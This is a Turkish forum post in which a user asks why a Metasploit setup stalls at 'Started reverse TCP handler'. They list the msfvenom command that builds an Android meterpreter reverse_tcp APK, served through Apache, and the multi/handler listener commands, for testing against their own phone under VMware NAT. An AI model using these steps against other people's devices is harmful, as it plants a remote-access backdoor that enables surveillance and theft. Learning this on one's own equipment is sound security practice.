Merhabalar. Kendi android cihazıma .apk dosyası göndermek ve Kali üzerinden sızmak istiyorum. Fakat exploit komutunu verdikten sonra VMware'de terminal'de şu komut ekranında kalıyor.
Started reverse TCP handler on 192.168.x.xx:4444
ifconfig komutunu girdikten sonra çıkan IP adresini kopyalayıp o şekilde yapıyorum. Bu arada NAT seçili ağ ayarlarından VMware'de.
Bir de ilginç bir durum şu kendi Android cihazımdan başlatmış olduğum IP adresine giremiyorum arkadaşlar.
Komutlar şunlar:
- ifconfig
- msfvenom -help
- msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.x.xx LPORT=4444 R > /var/www/html/androidApp.apk
- service apache2 status (Daha önce başlatmıştım) service apache2 start komutu ile
- msfconsole
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- show options
- set LHOST 192.168.x.xx
- show options (yeniden)
- exploit
exploit işte bu komutu girdikten sonra şöyle bir komut satırı geliyor ve o ekranda kalıyor. Dediğim gibi bundan sonra telefona .apk dosyasını indirmek istiyorum ama sunucuya ulaşamıyorum telefonumdan Apache Server'e.
Böyle bir ekranda kalıyor. Rehberi buraya tıklayarak izleyebilirsiniz. Şuradaki adamın yaptığının aynısını yapıyorum.
[*] Started reverse TCP handler on 192.168.x.xx:4444